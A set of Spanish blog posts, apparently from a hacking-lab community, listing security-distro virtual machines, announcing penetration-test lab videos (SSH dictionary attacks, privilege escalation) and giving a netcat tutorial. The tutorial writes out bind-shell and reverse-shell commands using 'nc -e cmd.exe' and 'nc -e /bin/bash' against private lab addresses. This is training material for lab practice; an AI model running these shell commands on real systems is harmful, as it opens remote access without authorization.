Estas imágenes serán muy útiles cuando se pretendan realizar laboratorios que requieran diferentes Sistemas Operativos como máquinas “atacantes”  y máquinas “víctimas”.

Están desarrolladas para ser utilizadas con cualquiera de los productos de VMWare. Recomiendo el uso de VMWare Player y Server como solución al tema de licenciamiento, aunque es posible utilizar VMWare WorkStation en modo Trial por 30 días. Todas estos entornos ya traen instaladas las VMWare Tools para facilitar la transferencia de datos entre uno y otro sistema.

Pronto publicaré otras máquinas virtuales para otras soluciones de virtualización (Virtual PC, Qemu, Virtual Box).

Imágenes tomadas de BagSide:

• BackTrack 4 beta (Imágen de VMware con VMWare Tools).
  • Back|Track 4 beta, with KDE 3.5.10 Desktop and Kernel 2.6.28.1. Now based on Ubuntu Intrepid. Loads of specialized applications for admins. VMwareTools 7.8.4-126130 installed along with SLIM Login manager, some extra scripts and the gtk-qt-engine. Released 11th Feb. 2009. The appliance occupies 4.2GB of the virtual disk which is 25GB in total. Default RAM is set at 688MB and the download is 839 MB. Regarded as one of the top Security distros.
  • Página oficial de BackTrack.
  • Descargar máquina virtual.

• BackTrack 3 (Imágen de VMware con VMWare Tools).
  • Descargar máquina virtual BackTrack 3.

• Caine / Computer Aided INvestigative Environment (Imágen de VMware con VMWare Tools).
  • CAINE (Computer Aided INvestigative Environment) is a GNU/Linux Digital Forensics distro for Interdepartment Center for Research on Security (CRIS), supported by the University of Modena and Reggio Emilia in Italy. Based on Ubuntu 8.04.1 with Kernel 2.6.24-24 and GNOME 2.22.3. Fully updated on the 2nd of March 2009. Released on the 22nd of Feb. 2009. The dynamic disk is 40GB and the appliance occupies 3.5GB installed and the download is 683 MB. 588 MB RAM is allocated as default.
  • Página Oficial de Caine.
  • Descargar máquina virtual Caine.

• Helix 2008R1 (Imágen de VMware con VMWare Tools).
  • Ubuntu 8.04 based Incident Response. Discovery, Forensics and Security Distro
    Kernel 2.6.24-21-generic with Gnome 2.22.3 Desktop. Fully upgraded on the 03/10/2008. The source and some dev-tools are installed as well as VMwareTools 6.5-118166. The resolution is DYNAMIC (drag the VMware frame to desired size). Distro release date 23/09/2008. The appliance occupies 2.8GB of the virtual disk which is 14GB in total. Default RAM is set at 568MB and the download is 708MB in total. Works well here. For those of you who wants to use or try applications like Adepto, Autopsy, GtkHash, Linen, Ophcrack etc.
  • Página oficial de Helix.
  • Descargar máquina virtual Helix.

• nUbuntu (Imágen de VMware con VMWare Tools).
  • Ubuntu 8.10 remaster loaded with Security tools for Bluetooth, Cisco, Scanners, Password, Exploits, Database, Fuzzers, Enum, VoiP and Wireless. Some build-tools and VMwareTools 7.8.4-125130 are installed. Release date 17/12/2008. The physical disk is 9GB whereoff 2.7 GB is used for the appliance. The download is 566 MB and RAM set at 548 MB.
  • Página oficial de nUbuntu.
  • Descargar máquina virtual nUbuntu.

• Samurai Web Testing Framework (Imágen de VMware con VMWare Tools).
  • Security and web penetration test suite based on Ubuntu 8.04
    Kernel 2.6.24-21-generic with Gnome 2.22.3 Desktop. Fully upgraded on 08/10/2008. Headers and some dev-tools are installed as well as VMwareTools 6.5-118166. The resolution is DYNAMIC (drag the VMware frame to desired size). Distro release date 10/08/1008. The appliance occupies 3.0GB of the virtual disk which is 14GB in total. Default RAM is set at 548MB and the download is 675MB in total. Works well here. Loaded with intrusion tools: DirBuster, Fierce Domain Scanner, Gooscan, Grendel-Scan, HTTP_Print fingerprinting tool, Maltego CE, Nikto, Paros, Rat Proxy, Spike Proxy , SQLBrute, w3af (and the GUI), Wapiti, WebScarab, WebShag, ZenMap, dnswalk, httping, httrack, john the ripper, netcat, nmap, siege, snarf etc.
  • Página oficial de Samurai Web Testing Framework.
  • Descargar máquina virtual Samurai Web Testing Framework.

• WeakNet Linux (Imágen de VMware con VMWare Tools).
  • Security distro from WeakNetLabs. Based on Ubuntu 8.04.1 with Kernel 2.6.24-21 and GNOME 2.22.3. Fully updated on the 22nd of November. Released on the 20th of November 2008. Substantial amount of security tools including WeakNetLabs own code and a ‘dashboard’ with main applications. The dynamic disk is 20GB and the appliance occupies 3.6GB installed and the download is 848 MB. 612 MB RAM is allocated as default.
  • Página oficial de WeakNet Linux.
  • Descargar máquina virtual Weaknet.

• CentOS (Imágen de VMware con VMWare Tools).
  • Red Hat Enterprise based with GNOME 2.16 desktop. Installed kernel-devel, cpp, gcc, build-tools and VMwareTools 7.8.4-126130, Adobe flash plugin, Yum-extender, Yum-utils and gtk-murrine-engine and some iconsets. Release date 31/03/2009. CentOS is ranked no.10 on Distrowatch. The physical disk is 40GB whereoff 4.1 GB i used for the appliance. The download is 813MB. Very mature and stable although not bleeding edge.
  • Página oficial de CentOS.
  • Descargar máquina virtual CentOS.

• FreeBSD (Imágen de VMware con VMWare Tools).
  • Standard with the following added, Opera 9.63, MySQL Server Client, Ruby, Apache, Ark, compat6, Nano and a few more plus VMwareTools. Occupies 4.5 GB on disk off a virtual dynamic disk of 20 GB. 644 MB RAM allocated and the download is 904 MB. Works here after some serious tweaking and fixing. I must say that I have still problems getting to grips with all BSD’s as VMware guest OS desktops although this is probably the best one I have built so far.
  • Página oficial de FreeBSD.
  • Descargar máquina virtual FreeBSD.

Imágenes tomadas de Virtual Appliance Marketplace:

• Astaro Mail / Web / Security Gateway (Imágen de VMware).
  • Astaro Mail Gateway provides complete protection and control over spam, viruses, worms and Trojans transferred through email. The All-In-One mail security appliance features comprehensive features for spam detection and malware filtering.
  • Astaro Web Gateway provides complete protection and control over data transferred over the web. The All-In-One web security appliance features Malware Detection, Application Control, URL Filtering and Bandwidth Management, fully integrated and manageable through a single and intuitive browser-based user interface.
  • Astaro Security Gateway integrates complete Network, Web and Mail Security through an intuitive browser-based user interface. The Astaro Unified Threat Management appliance is the most easy-to-use and cost-effective “all-in-one” solution available, working to effectively shield businesses from internet based threats everyday.
  • Página oficial de Astaro Mail Gateway.
  • Descargar Astaro Mail gateway.
  • Descargar Astaro Web Gateway.
  • Astaro Security Gateway.

• WiKID Strong Authentication Server Community Edition 3.3.8 (Imágen de VMware).
  • The WiKID Strong Authentication System is a dual-source, software-based two-factor authentication system designed to be less expensive and more extensible than hardware tokens.
  • Página oficial de WiKID Strong Authentication Server Community Edition.
  • Descargar máquina virtual WiKID Strong Authentication Server Community Edition.

• Accellion Secure File Transfer (Imágen de VMware).
  • Secure File Transfer Virtual Appliance – secure, economical and easy to use secure file transfer for today’s global enterprises.
  • Página oficial de Accellion Secure File Transfer.
  • Descargar máquina virtual  Accellion Secure File Transfer.

• ShellNET MiniVM (Imágen de VMware).
  • Web Interface for managing Nessus Vulnerability Scans and results.
  • Página oficial de ShellNET MiniVM.
  • Descargar máquina virtual ShellNET MiniVM.

• JanusVM (Imágen de VMware con VMWare Tools).
  • Internet Privacy Appliance :: Encrypts your Internet traffic, hides your IP address, and is easy to setup.
  • Página oficial de JanusVM.
  • Descargar máquina virtual JanusVM.

• OWASP Live CD (Imágen de VMware con VMWare Tools).
  • The overarching goal for this project is to make application security tools and documentation easily available. I see this as a great complement to OWASP’s goal to make application security visible.
  • Página oficial de OWASP Live CD.
  • Descargar máquina virtual de OWASP Live CD.

• Fireball ISO Builder (Imágen de VMware).
  • Fireball ISO Builder is a VMWare virtual appliance that builds a bootable Gentoo Linux-base ISO image, focused on providing security and networking services to a network. IPv4 and IPv6. go6.net tunnel broker. DHCP, DNS, SSHD services.
  • Página oficial de Fireball ISO Builder.
  • Descargar máquina virtual de Fireball ISO Builder.

• Nepenthes VMware Appliance (Imágen de VMware con VMWare Tools).
  • Nepenthes is a low interaction honeypot like honeyd or mwcollect. Low Interaction Honeypots emulate known vulnerabilities to collect information about potential attacks. Nepenthes is designed to emulate vulnerabilties worms use to spread, and to capture these worms. As there are many possible ways for worms to spread, Nepenthes is modular. There are module interface to Resolve DNS Asynchronous, Emulate Vulnerabilities, Download Files, Submit the Downloaded Files, Trigger Events, Shellcode Handler.
  • Página oficial de Nepenthes VMware Appliance.
  • Descargar máquina virtual Nepenthes.

En el siguiente video tutorial veremos como accedemos al sistemas con los datos obtenidos, veremos además como recolectamos la información sensible del mismo, como la podemos descifrar y como modificamos el archivo de configuración del servidor FTP para transferir los datos.

Con esta sesión damos por terminado el “resumen” de los laboratorios 5 y 6 realizados en la ciudad de Medellín, y al Laboratorio Virtual relizado en el pasado mes de diciembre. Solo bastará otro post a modo de conclusiones sobre el mismo y la invitación a que participen en los próximos

Descargar video tutorial Test de Penetración – Acceso a la Información sensible (Password: www.dragonjar.org)

Sin lugar a dudas el servicio de SSHD – Secure Shell Daemon es el más opcionado para ser nuestro primer objetivo.

En el siguiente video tutorial veremos como recolectamos información sensible de la compañía desde la propia página Web, además como hacemos uso de esa misma información para llevar a cabo un ataque basado en diccionario al servicio SSH.
Luego veremos como con base a la información y la interacción con el sistema se hace necesario escalar privilegios en el mismo. Todo esto y más en el video tutorial.

Descargar video tutorial de Test de Penetración – System Hacking (Password: www.dragonjar.org)

En el siguiente video tutorial veremos como crear una nueva maquina virtual en VMWare WorkStation, como confirgurarla para que trabaje como el entorno virtualizado de intrusión objeto de estudio de estos Laboratorios Virtuales y como acceder a las intrucciones de desarrollo del mismo, utilizando como cliente BackTrack.

Descargar video tutorial de configuración del entorno virtualizado de intrusión en Linux (Password: www.dragonjar.org) – formato del video: .ogg

En el siguiente video tutorial profundizo un poco más sobre el proyecto de LiveCD’s como herramientas de prácticas de Test de Intrusión; Desarrollo original de Thomas Wilhem (De-ICE.net PenTest LiveCDs Project).
Además muestro el proceso de configuración y ejecución de los entornos virtuales de intrusión sobre VMWare WorkStation y Qemu.

En los próximos video tutoriales mostraré como llevar a cabo el montaje de estos entornos bajo ambientes Linux y el desarrollo del propio Test de Penetración desde BackTrack.

Descargar video tutorial de configuración de los ambientes virtuales de intrusión (Password: www.dragonjar.org)

La presentación no busca recrear por completo los temas tratados en cada uno de estos laboratorios, en lugar de ello presenta los apartes más importantes de los mismos, tratando de profundizar mucho más en los aspectos prácticos y técnicos.

Se hace necesario aclarar que en este video tutorial se presentan algunos conceptos a manera muy general, sin llegar al detalle como se ha hecho en cada una de las sesiones presenciales y virtuales, pues este solo busca nivelar y resumir sobre las sesiones realizadas a las personas que por diferentes razones no han podido estar presentes en estos, además de invitar a la comunidad e interesados a participar en los próximos.

La siguiente es la agenda a cubrir en la sesión:

- ¿Quiénes somos?
- Conceptos básicos sobre Seguridad Informática / Test de Penetración
- Estado actual de los Laboratorios de Seguridad Informática
- ¿Qué son los Laboratorios de Seguridad Informática Labs.DragonJAR.org?
- Laboratorios realizados
- Objetivo del Laboratorio
- Contenido del Laboratorio
- Materiales necesarios para desarrollar el Laboratorio
- Desarrollo del Laboratorio
- Conclusiones

Este video tutorial llega hasta la presentación y resumen de los laboratorios realizados hasta la fecha, definición de aspectos básicos la seguridad de la información/Test de Penetración e introducción en el ambiente virtualizado a desarrollar.

En los próximos veremos como podemos llevar a cabo el proceso de configuración y desarrollo del Test de Penetración.

Descargar video tutorial de presentación e introducción en el Laboratorio de Test de Penetración (Password: www.dragonjar.org)

Este será llevado a cabo el próximo sabado 20 de diciembre – 2:00 PM To 4:00 PM (GMT-05:00) Eastern Time (US & Canada)

Los interesados deben enviarme un correo electrónico, al cual yo responderé con el enlace al salón virtual.

4v4t4r @ gmail . com

La temática para este primer laboratorio virtual es la siguiente:

Test de Penetración 1 (Introducción y Desarrollo)

La finalidad de este primer Laboratorio virtual de Test de Penetración, será el ofrecer las técnicas, procesos y procedimientos necesarios para llevar a cabo un Test de Penetración haciendo uso de la Multi-Herramienta BackTrack.

Esto conllevará entonces a aprender y prácticar con ejemplos claros, sobre el uso de esta máginifica distribución. Además de las metodologías necesarias en un Test de Penetración.

Escenario propuesto:

El escenario para este Laboratorio es el de un CEO de una pequeña empresa que ha sido presionado por el Comité Administrativo para ser objeto de un Test de Penetración a realizarse desde la empresa. El Director General afirma que su empresa es segura, cree además de que este Test de Penetración será un enorme desperdicio de dinero, sobre todo porque ya tiene una solución de exploración (escaneo) de vulnerabilidades (Nessus). Para hacer “felices” a los del Comité Administrativo, él decide contratarlo a usted y le dá un plazo de 5 días para realizar el trabajo, pues como se mencionó él no cree que la empresa sea vulnerable a cualquier intento de acceso no autorizado.
Su tarea es analizar solo un servidor en el cual se aloja una página Web que ofrece información de contacto de la misma.

El Director General espera que usted intente con todos los tipos de ataques que estén a su disposición, pues está seguro de que usted no podrá vulnerar el sistema y obtener acceso.
Demostrar que el sistema es vulnerable sería la mejor manera de concientizar al Director General, para desde allí implementar mejores prácticas en materia de seguridad Informática.
———-

De esta manera hago la invitación a todos los interesados en participar. No existe entonces la limitación geográfica que muchos usuarios presentan .

Por ahora y como vieron en la descripción se hace necesario tener la distribución BackTrack.

La idea entonces es que descarguen la imágen y la configuren en una máquina virtual (VMWare Player / WorkStation / Server).
Como sugerencia personal preferiría que descargaran la siguiente máquina virtual ya creada, con las vmware tools instaladas y lista para ser usada.

Descargar Máquina Virtual BackTrack 3 (Desarrollada por Bagside)

Ahora publico el sistema que será objeto del Test de Penetración.

Descargar imágen de Entorno Virtualizado de Intrusion +/- 195Mb

La idea es que vayan leyendo los enlaces que publiqué anteriormente, además pueden ir descomprimiendo la máquina virtual BackTrack (+/- 1.5Gb).
Recuerden además que este laboratorio será desarrollado en cualquiera de los productos VMWare (WorkStation, Player, Server), aunque de todas maneras mostraré como puede configurarse en Qemu. Así que por lo tanto deben tener instalado cualquiera de esos productos (preferiblemente VMWare WorkStation).

El laboratorio promete, así que espero no se lo pierdan, mucho menos las personas de otras ciudades y paises que han querido participar en los Hack Labs que realizo en mi ciudad.

Para ese día deben tener un buen sistema de sonido (ej. diadema o audífonos, para poder recepcionar bien el audio).
Espero además que tengan una buena conexión a internet, pues algunos recursos así lo requieren.

Aún sigo esperando los correos electrónicos de las personas que estén interesadas, hasta el momento solo he recibido 8 correos, y solo puede ser transmitida la invitación por ese medio.
De la buena asistencia depende de que continúe o no con la realización y publicación de los mismos

Textos e información de interés:

http://labs.dragonjar.org/descubrimiento-de-aplicaciones-nmap
http://labs.dragonjar.org/video-tutorial-de-instalacion-de-backtrack-3
http://labs.dragonjar.org/test-de-penetracion-con-backtrack-netcat
http://labs.dragonjar.org/test-de-penetracion-con-backtrack-servicios-basicos
http://labs.dragonjar.org/test-de-penetracion-con-backtrack-conceptos-basicos
http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-identificacion-de-banner%e2%80%99s-banderas-i
http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-identificacion-de-banner%e2%80%99s-banderas-ii
http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-enumeracion-del-objetivo-ii
http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-scanning-i
http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-scanning-ii
http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-scanning-iii
http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-ataques-por-fuerza-bruta-brute-force-i
http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-ataques-por-fuerza-bruta-brute-force-iii
http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-ataques-por-fuerza-bruta-brute-force-v
http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-ataques-por-fuerza-bruta-brute-force-vi

En el transcurso de la semana iré publicando el ambiente virtualizado de intrusión que utilicé para esta sesión, así mismo publicaré los videos de como realizarlo (solo uno de los métodos para realizarlo, pues existen algunos más).

La asistencia fue masiva, pues al completarse el registro para una persona por computador, muchos atendieron a la opción que dí, la cual consistía en que llevaran sus equipos portátiles personales.

Este HackTaller sirvió para entrar en contacto de una manera más práctica con la temática de la seguridad informática, más especificamente con los Test de Intrusión, concientizó a todos los asistentes sobre lo mucho que aún nos falta por aprender y que este espacio y este tipo de eventos nos permitirán mejorar , investigar y desarrollar capacidades cognoscitivas.

El próximo sabado repetiré este mismo HackTaller con las personas que esten interesadas en asistir y que no alcanzaron cupo. El martes confirmo la realización del mismo.

No queda nada más que agradecer a todos los asitentes, como siempre a Jhony y Sebas quienes siempre están pendientes y dispuestos a facilitarme el espacio, a los nuevos amigos del Sena, quienes se hicieron presentes y compartieron de este HackTaller (y que le dirán a fernando que les enseñe todo lo que el sabe), a los compañeros de SoftNet (quienes por amor al arte les toco sentados en el piso con sus laptops) que amablemente ofrecieron algunos dispositivos que poseen en sus trabajos.

A todos los que no pudieron asistir se les extrañó, y espero que puedan hacerlo para el próximo HackTaller

Dejo a continuación el enlace de acceso al registro fotográfico del HackTaller, (no quedé en ninguna foto… ando de fotografo últimamente XD creo que moriré de hambre…)

Galería Fotográfica del 5° HackTaller realizado en Medellín

Galería en modo presentación

Sus capacidades hacen que sea a menudo usada como una herramienta para abrir puertas traseras una vez invadido un sistema y obtenido privilegios de administrador o root del equipo. También resulta extremadamente útil a efectos de depuración para aplicaciones de red.

Ya en desuso, originariamente se trataba de una potentísima herramienta de red para administradores no habiéndose descubierto hasta la fecha el total de los comandos que se utilizaban, los cuales permanecen secretos por las particularidades de esta herramienta. (Más información – Web Oficial)

En muchas ocasiones y por diferentes razones se hace necesario realizar conexiones a puertos TCP y UDP.

Algunas de estas razones pueden ser:

• Cuando necesitamos comprobar la disponibilidad de un puerto (si este se encuentra abierto o cerrado).
• Cuando queremos leer el banner de dicho puerto (servicio gestionado por el mismo).
• Cuando necesitamos conectarnos a un servicio de red de manera manual.

El modo de uso de netcat ya ha sido tratado de manera superficial en algunos laboratorios. Trataremos entonces de profundizar un poco más en este laboratorio sobre las posibilidades de la herramienta, aunque tampoco será la “Guía definitiva de Netcat”, si nos acercará un poco más a la misma.

Algunas de las publicaciones donde he hecho referencia sobre netcat son las siguientes:

Laboratorios: Hacking – Técnicas y contramedidas – Identificación de Banner’s (Banderas) I
Laboratorios: Hacking – Técnicas y contramedidas – Scanning II
Solución del HackTaller 01 DragonJAR (II de VIII)
Solución del HackTaller 01 DragonJAR (III de VIII)

Ayudas y Opciones de Comandos

Nota: Netcat es una herramienta que viene incluída y lista para ser usada desde la distribución Linux BackTrack, la cual es el objeto de estudio de esta serie de prácticas.

Uno de los primero acercamientos a netcat que debe realizar cada investigador es la exploración del propio sistema de ayudas y opciones de comandos que incluye la herramienta. Para ello bastará con ejecutar la siguiente sintaxis desde la línea de comandos:

nc -h

Para lo cual obtendremos el siguiente resultado:

nc -h
[v1.10]
connect to somewhere: nc [-options] hostname port[s] [ports] …
listen for inbound: nc -l -p port [-options] [hostname] [port]
options:
-e prog program to exec after connect [dangerous!!]
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, …
-h this cruft
-i secs delay interval for lines sent, ports scanned
-l listen mode, for inbound connects
-n numeric-only IP addresses, no DNS
-o file hex dump of traffic
-p port local port number
-r randomize local and remote ports
-s addr local source address
-t answer TELNET negotiation
-u UDP mode
-v verbose [use twice to be more verbose]
-w secs timeout for connects and final net reads
-z zero-I/O mode [used for scanning]
port numbers can be individual or ranges: lo-hi [inclusive]

Identificación de Banners e información

Para intentar una conexión y obtener información de un sistema y puerto específico la sintaxis es la siguiente:

nc -vv IP/HostName Puerto

Una vez visualizada la información requerida procedemos a detener la ejecución con la combinación de teclas Ctrl + C.

Consultando el Servidor Web que gestiona un sistema Objetivo

Se trata de realizar una conexión al puerto comunmente utilizado para servir páginas Web (80), luego se envía una petición HTTP / HEAD para obtener y leer el banner del servidor HTTP. Para ello ejecutaremos la siguiente sintaxis:

nc -vv IP/HostName Puerto

Netcat a la escucha sobre puertos TCP/UDP y Chat

Establecer a Netcat en modo “listen” (escucha) en un puerto TCP / UDP es una de las tareas más implementadas con la herramienta, pues permite depurar clientes y/o aplicaciones de red, envío/recepción de datos, ejecución de terminales, etc.

Vamos como establecer a Netcat en modo “listen” (escucha) y como podemos implementar sobre el mismo un pequeño pero útil sistema de Chat entre dos equipos.

Para ello contamos con dos máquinas (Windows/Linux)
Windows: IP 10.30.3.116
Linux: IP 10.30.3.84

La máquina con Linux BackTrack será el sistema donde se establezca Netcat en modo “listen”, veamos:

nc -lvv 12345

El cliente será el sistema Windows

Transferencia de Archivos con Netcat

Otra de las bondades que permite realizar Netcat es la posibilidad de habilitar una conexión para transferir archivos entre dos equipos. Esto permitirá entonces enviar/recibir archivos de texto y/o binarios entre ellos.

Para ello contamos con dos máquinas (Windows/Linux)
Windows: IP 10.30.3.116
Linux: IP 10.30.3.84

Debemos ejecutar la siguiente sintaxis:

nc -lvp 12345 > salida.txt

El equipo server (Linux BackTrack) estará habilitado en modo listen (escucha) y redireccionando los datos recibidos a un archivo de salida, veamos:

El equipo cliente (Windows) establecerá la conexión con BackTrack (al puerto 12345) y enviará el archivo.
para ello primero crearemos el archivo de texto a enviar. Veamos:

Así se vería desde el servidor BackTrack cuando recibe los datos

Luego procedemos a comprobar la información contenida en el envío

Administración Remota con Netcat (Shell)

Sin lugar a dudas esta es una de las mejores utilidades que se le pueda dar a Netcat, pues como hemos visto esta grandiosa herramienta permite redireccionar instrucciones y comandos. Esto significa que podemos tomar por ejemplo un archivo .exe y redirigir la entrada/salida y mensajes de error a los puertos TCP/UDP que establezcamos.

Veamos en la práctica como podemos redirigir el ejecutable CMD.EXE a un cliente de red en un puerto local. De esta manera ofreceremos una línea de comandos a cualquier usuario que establezca una conexión a nuestro equipo y puerto establecido.

Para ello contamos con dos máquinas (Windows/Linux)
Windows: IP 10.30.3.116
Linux: IP 10.30.3.84

Windows hará el papel de servidor, quién ofrecerá una línea de comandos a los clientes que establezcan una conexión con él.

nc -lvp 12345 -e cmd.exe

Ahora desde BackTrack, quién actua como cliente, establecerá una conexión con Windows. Veamos:

nc -v 10.30.3.116 12345

Shell Inversa con Netcat

A diferencia del escenario anterior y como en muchas ocasiones sucede, no se puede controlar y administrar las salidas/entradas o disposición de puertos. Para ello Netcat nos ofrece otra solución más en su repertorio. Se trata entonces de establacer a Netcat en modo “listen” y el posterior envío/recepción de comandos, entre ellos la ejecución de una terminal. Veamos:

Para ello contamos con dos máquinas (Windows/Linux)
Windows: IP 10.30.3.116
Linux: IP 10.30.3.84

En este caso el sistema Windows pretende obtener una shell del sistema Linux BackTrack, con la limitante de que BackTrack no puede en ese momento servir una shell en modo “Listen”.

Desde Windows se establece el modo Listen:

nc -lvp 12345

Ahora desde Backtrack se establece la conexión hacia Windows y la instrucción que este deberá servir al mismo:

nc -v 10.30.3.116 12345 -e /bin/bash

Enviemos una instrucción (comando) desde Windows para que el resultado pueda ser visualizado desde el mismo.

Estos son solo algunos de los muchos usos que se le pueden dar a Netcat, por ello es que se le conoce como la navaja suiza de las redes .

A partir de este momento queda abierto el espacio para que los interesados profundicen en el uso de la herramienta.

Recomiento la lectura de estas páginas web, donde se detallan algunos usos e información de la herramienta:

Crysol
Netcat en la Wikipedia
Web Oficial de Netcat